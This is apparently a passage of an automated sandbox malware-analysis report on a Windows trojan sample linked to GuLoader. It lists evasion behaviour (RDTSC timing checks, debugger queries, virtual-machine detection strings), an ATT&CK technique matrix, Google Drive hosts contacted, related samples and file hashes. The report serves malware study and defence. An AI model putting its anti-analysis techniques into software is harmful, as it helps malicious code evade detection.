        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeAPI/Special instruction interceptor: Address: 5EF9C35
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeAPI/Special instruction interceptor: Address: 2389C35
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeRDTSC instruction interceptor: First address: 5E97B8C second address: 5E97B8C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F3568E1487Fh 0x00000006 cmp bl, cl 0x00000008 inc ebp 0x00000009 test edx, 2A835423h 0x0000000f inc ebx 0x00000010 test cx, ax 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeRDTSC instruction interceptor: First address: 2327B8C second address: 2327B8C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F35687BF83Fh 0x00000006 cmp bl, cl 0x00000008 inc ebp 0x00000009 test edx, 2A835423h 0x0000000f inc ebx 0x00000010 test cx, ax 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrA3C7.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: Amcache.hve.7.drBinary or memory string: VMware
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.00000000044E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.00000000044E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWY
        Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000000.00000002.2303550043.0000000000478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\3B
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeAPI call chain: ExitProcess graph end nodegraph_0-4749
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Masquerading
        OS Credential Dumping1
        Query Registry
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
        Process Injection
        1
        Virtualization/Sandbox Evasion
        LSASS Memory221
        Security Software Discovery
        Remote Desktop Protocol1
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager1
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Process Injection
        NTDS3
        File and Directory Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information
        LSA Secrets23
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe21%VirustotalBrowse
        SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe19%ReversingLabs
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsrA3C7.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsrA3C7.tmp\System.dll1%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        142.250.186.142
        truefalse
          high
          drive.usercontent.google.com
          216.58.212.129
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalse
              high
              https://www.google.comSecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.ftp.ftp://ftp.gopher.SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
                  high
                  https://drive.google.com/r:CSecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.usercontent.google.com/SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2422381970.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2423017687.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593660655.00000000044FC000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://upx.sf.netAmcache.hve.7.drfalse
                        high
                        https://drive.google.com/R:cSecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalse
                            high
                            http://nsis.sf.net/NSIS_ErrorSecuriteInfo.com.Win32.Evo-gen.26137.19757.exefalse
                              high
                              https://apis.google.comSecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Win32.Evo-gen.26137.19757.exefalse
                                  high
                                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.186.142
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    216.58.212.129
                                    drive.usercontent.google.comUnited States
                                    15169GOOGLEUSfalse
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1617617
                                    Start date and time:2025-02-18 05:27:17 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
                                    Detection:MAL
                                    Classification:mal76.troj.evad.winEXE@4/30@2/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 83%
                                    • Number of executed functions: 55
                                    • Number of non-executed functions: 30
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29, 4.245.163.56, 13.107.246.45, 20.190.160.22
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    TimeTypeDescription
                                    23:29:42API Interceptor1x Sleep call for process: WerFault.exe modified
                                    No context
                                    No context
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e191638743478-734687553.8.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    rJustificante67.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    rJustificante67.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    SecuriteInfo.com.W32.PossibleThreat.6050.24821.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    SecuriteInfo.com.W32.PossibleThreat.6050.24821.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    RFQ_SRC02252017-pdf.scr.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    RFQ_SRC02252017-pdf.scr.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 142.250.186.142
                                    • 216.58.212.129
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsrA3C7.tmp\System.dllSecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      rquotation.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoaderBrowse
                                            CdB3FZ9vyI.exeGet hashmaliciousUnknownBrowse
                                              z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    Nondesistance.exeGet hashmaliciousGuLoaderBrowse
                                                      Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.0567155011220382
                                                        Encrypted:false
                                                        SSDEEP:384:8lzS9mylWuEBU/efljTzuiFBY4IO8KG7:SzWmyLEBU/efljTzuiFBY4IO8KG
                                                        MD5:D7C86A9D0535D5EB8160A07E99660AB1
                                                        SHA1:9BFDD793470DEA8881F529504BE55D24284BA6D8
                                                        SHA-256:8FF3B6834F1A1A9260DFB5B5C976077020E269A8E0E3935A1538F57B706D280F
                                                        SHA-512:0185D16F318A1CDE580DAFC4F1D61613799CFA70A7E185C363333484D9DE0134ADA6337B749A8736CDAAFBD93DEF1996897082A7600E5384847132F3DF21E334
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.4.3.2.6.5.6.6.3.6.3.1.8.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.4.3.2.6.5.6.6.8.0.0.6.8.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.9.e.9.3.0.9.-.0.3.7.b.-.4.e.8.d.-.9.0.b.0.-.d.6.1.5.4.6.b.8.8.d.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.f.a.c.a.a.1.-.9.c.f.4.-.4.7.e.7.-.b.a.d.6.-.4.8.8.e.b.a.4.2.5.5.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...E.v.o.-.g.e.n...2.6.1.3.7...1.9.7.5.7...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.u.n.d.f.a.n.g.e.l.s.e.n. .r.e.s.u.r.c.e.a.n.v.e.n.d.e.l.s.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.c.8.-.0.0.0.1.-.0.0.1.4.-.f.0.f.9.-.6.6.a.9.b.d.8.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.e.3.e.b.5.2.3.d.c.5.b.4.8.c.f.7.3.f.1.f.b.5.b.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 14 streams, Tue Feb 18 04:29:26 2025, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):103892
                                                        Entropy (8bit):2.0653944960974084
                                                        Encrypted:false
                                                        SSDEEP:384:xJwr9tCebHu/PB5WcYURapLW73Di0eCJbGSMxZAfBka0Ukf0SuC5yHr:M9webHY5WcYya473FeCpHdaE
                                                        MD5:04EF99323144F98AE189A7FF96CA04FF
                                                        SHA1:E8764AACB780E4198F2866C418BE1E736FD70416
                                                        SHA-256:97A695DDA72173A4150784A6471B958FB0F880691FBD4F90C09C044F22502C3E
                                                        SHA-512:F84E1879C73A71E9EE899DF44513F6A00DD9E52888588448D56A2631CCA88065E365D34B25BF59BC83992CE14E6BD73676708535574C615858FEE9FBCE526BB6
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:MDMP..a..... ..........g........................T................J..........T.......8...........T...........HJ...K..........@"..........,$..............................................................................eJ.......$......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):6484
                                                        Entropy (8bit):3.7322906789312893
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJo4T62cYcrgprO89bv1hqsfTFm:R6lXJoE62cYcryv9fc
                                                        MD5:3831FC376080D8A7A158A4F20D7D8A19
                                                        SHA1:BAE511A9FDF774FEEEEE5B61B4A8CA68AA5B9ADD
                                                        SHA-256:D3043B592DD44A6EE8AE8886E959A237C1519CF30B38CEC4F17AFFF36F32B787
                                                        SHA-512:17CA354E86D3B08AC69CE14C906F3460551E8E65BE04BD669FE7D918D0169D68D55920D21B823226C2DCA2BD143D9AAADA2FDB16A3CB7E53D5CA7C6CBEBB1AF5
                                                        Malicious:false
                                                        Reputation:low
